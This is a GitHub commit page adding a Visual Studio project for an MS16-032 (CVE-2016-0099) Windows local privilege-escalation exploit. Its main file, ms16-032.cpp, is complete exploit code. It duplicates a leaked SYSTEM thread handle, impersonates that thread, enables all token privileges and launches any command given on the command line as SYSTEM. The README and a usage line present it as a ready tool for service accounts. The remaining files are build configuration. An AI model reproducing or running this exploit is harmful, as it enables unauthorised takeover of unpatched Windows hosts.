Skip to content

Commit

Permalink
public
Browse files Browse the repository at this point in the history
public
  • Loading branch information
zcgonvh committed Mar 15, 2017
0 parents commit a97819f
Show file tree
Hide file tree
Showing 7 changed files with 388 additions and 0 deletions.
6 changes: 6 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
# MS16-032(CVE-2016-0099) for SERVICE ONLY

**this exploit can only use on SERVICE**

do logical exploit,on logical exploits.

Binary file added ms16-032.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
28 changes: 28 additions & 0 deletions ms16-032.sln
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ms16-032", "ms16-032\ms16-032.vcxproj", "{90842927-6D62-4465-93A3-37FC28C12018}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Release|Win32 = Release|Win32
Release|x64 = Release|x64
Release64|Win32 = Release64|Win32
Release64|x64 = Release64|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{90842927-6D62-4465-93A3-37FC28C12018}.Release|Win32.ActiveCfg = Release|Win32
{90842927-6D62-4465-93A3-37FC28C12018}.Release|Win32.Build.0 = Release|Win32
{90842927-6D62-4465-93A3-37FC28C12018}.Release|x64.ActiveCfg = Release|Win32
{90842927-6D62-4465-93A3-37FC28C12018}.Release|x64.Build.0 = Release|Win32
{90842927-6D62-4465-93A3-37FC28C12018}.Release64|Win32.ActiveCfg = Release64|Win32
{90842927-6D62-4465-93A3-37FC28C12018}.Release64|Win32.Build.0 = Release64|Win32
{90842927-6D62-4465-93A3-37FC28C12018}.Release64|x64.ActiveCfg = Release64|x64
{90842927-6D62-4465-93A3-37FC28C12018}.Release64|x64.Build.0 = Release64|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
161 changes: 161 additions & 0 deletions ms16-032/ms16-032.cpp
Original file line number Diff line number Diff line change
@@ -0,0 +1,161 @@
// ms16-032.cpp : 定义控制台应用程序的入口点。
//
//https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html

#include <stdio.h>
#include <Windows.h>
DWORD WINAPI ThreadProc(LPVOID lpParam){
BYTE b[1030];
DWORD d = 0;
while (ReadFile((HANDLE)lpParam, b, 1024, &d, 0))
{
b[d] = '\0';
printf("%s", b);
fflush(stdout);
}
return 0;
}
void die(char* c)
{
printf("%s: %d\n", c, GetLastError());
exit(-1);
}
typedef NTSTATUS __stdcall _NtImpersonateThread(HANDLE,HANDLE,PSECURITY_QUALITY_OF_SERVICE);
int wmain(int argc, WCHAR* argv[])
{
printf("[#] ms16-032 for service by zcgonvh\n");
if (argc != 2)
{
printf("[#] usage: ms16-032 command \n");
printf("[#] eg: ms16-032 \"whoami /all\" \n");
return -1;
}
BOOL b = false;
IsWow64Process(GetCurrentProcess(), &b);
if (b) {
printf("[x] please re-compiler this program via x64 platform\n");
return 0;
}
WCHAR* wsSelf = (PWCHAR)malloc(65536*2);
PROCESS_INFORMATION pi = {};
STARTUPINFO si = {};
si.cb = sizeof(si);
si.hStdInput = GetCurrentThread();
si.hStdOutput = GetCurrentThread();
si.hStdError = GetCurrentThread();
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
GetModuleFileName(0, wsSelf, MAX_PATH);
if (!CreateProcessWithLogonW(L"a", L"a", L"a", LOGON_NETCREDENTIALS_ONLY, 0, wsSelf, CREATE_SUSPENDED, 0, 0, &si, &pi))
{
die("[x] may be patched");
}
if (!pi.hProcess)
{
die("[x] may be patched");
}
HANDLE hThread;
if (!DuplicateHandle(pi.hProcess, (HANDLE)4, GetCurrentProcess(), &hThread, 0, FALSE, DUPLICATE_SAME_ACCESS))
{
TerminateProcess(pi.hProcess, 1);
die("[x] can not duplicate thread handle");
}
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
HANDLE hCurrentToken, hToken;
DWORD d=0;
PTOKEN_PRIVILEGES tp = (PTOKEN_PRIVILEGES)malloc(2048);
_NtImpersonateThread* NtImpersonateThread=(_NtImpersonateThread*)GetProcAddress(GetModuleHandle(L"ntdll"),"NtImpersonateThread");
SECURITY_QUALITY_OF_SERVICE sqos = {};
sqos.Length = sizeof(sqos);
sqos.ImpersonationLevel = SecurityImpersonation;
SetThreadToken(&hThread, 0);
NTSTATUS status = NtImpersonateThread(hThread, hThread, &sqos);
if (status)
{
printf("[x] can not do self-impersonate : %x\n", status);
return -1;
}
if (!OpenThreadToken(hThread, TOKEN_ALL_ACCESS, 0, &hToken))
{
die("[x] can not open token from SYSTEM thread");
}
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hCurrentToken))
{
die("[x] can not open current process token");
}
if(!GetTokenInformation(hCurrentToken, TokenPrivileges, tp, 2048, &d))
{
die("[x] can not get current privileges");
}
for (int i = 0; i < tp->PrivilegeCount; i++)
{
tp->Privileges[i].Attributes = SE_PRIVILEGE_ENABLED;
}
if (!AdjustTokenPrivileges(hCurrentToken, false, tp, d, NULL,NULL))
{
die("[x] adjust all privileges fail");
}
b = false;
DWORD data[] = { 2, 1, 0, 0, 0 , 0, 0, 0 };
PPRIVILEGE_SET pset = (PPRIVILEGE_SET)data;
pset->Privilege[0].Attributes = SE_PRIVILEGE_ENABLED;
LookupPrivilegeValue(0, SE_ASSIGNPRIMARYTOKEN_NAME, &pset->Privilege[0].Luid);
pset->Privilege[1].Attributes = SE_PRIVILEGE_ENABLED;
LookupPrivilegeValue(0, SE_INCREASE_QUOTA_NAME, &pset->Privilege[1].Luid);

SECURITY_ATTRIBUTES sa = { 0 };
HANDLE hRead, hWrite;
ZeroMemory(&si,sizeof(si));
ZeroMemory(&pi,sizeof(pi));
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = true;
CreatePipe(&hRead, &hWrite, &sa, 1024);
si.hStdError = hWrite;
si.hStdOutput = hWrite;
si.lpDesktop = L"WinSta0\\Default";
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
HANDLE hReadThread = CreateThread(NULL, 0, ThreadProc, hRead, 0, NULL);
HANDLE hPrimary;
if (!DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, 0, SecurityImpersonation, TokenPrimary, &hPrimary))
{
die("[x] can not duplicate token to primary");
}
if (PrivilegeCheck(hCurrentToken, pset, &b) && b)
{
printf("[+] %ws was assigned\n",SE_ASSIGNPRIMARYTOKEN_NAME);
CreateProcessAsUser(hPrimary, 0, argv[1], 0, 0, true, 0, 0, 0, &si, &pi);
}
else
{
pset->PrivilegeCount = 1;
LookupPrivilegeValue(0, SE_IMPERSONATE_NAME, &pset->Privilege[0].Luid);
if (PrivilegeCheck(hCurrentToken, pset, &b) && b)
{
printf("[+] %ws was assigned\n", SE_IMPERSONATE_NAME);
CreateProcessWithTokenW(hPrimary, 0, 0, argv[1], 0, 0, 0, &si, &pi);
}
else
{
printf("[x] no privileges assigned! this program can only use on SERVICE.");
return -1;
}
}
if (pi.dwProcessId)
{
printf("[!] process with pid: %d created.\n==============================\n", pi.dwProcessId);
fflush(stdout);
WaitForSingleObject(pi.hProcess, -1);
TerminateThread(hReadThread, 0);
return -1;
}
else
{
die("[x] can not create process");
}
return 0;
}

164 changes: 164 additions & 0 deletions ms16-032/ms16-032.vcxproj
Original file line number Diff line number Diff line change
@@ -0,0 +1,164 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Release64|Win32">
<Configuration>Release64</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release64|x64">
<Configuration>Release64</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{90842927-6D62-4465-93A3-37FC28C12018}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>ms16032</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120_xp</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120_xp</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release64|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120_xp</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release64|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120_xp</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release64|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release64|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release64|Win32'">
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release64|x64'">
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>NotUsing</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>NotUsing</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release64|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>NotUsing</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release64|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>NotUsing</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<Text Include="ReadMe.txt" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="ms16-032.cpp" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
25 changes: 25 additions & 0 deletions ms16-032/ms16-032.vcxproj.filters
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="源文件">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="头文件">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="资源文件">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<Text Include="ReadMe.txt" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="ms16-032.cpp">
<Filter>源文件</Filter>
</ClCompile>
</ItemGroup>
</Project>
4 changes: 4 additions & 0 deletions ms16-032/ms16-032.vcxproj.user
Original file line number Diff line number Diff line change
@@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>

0 comments on commit a97819f

Please # to comment.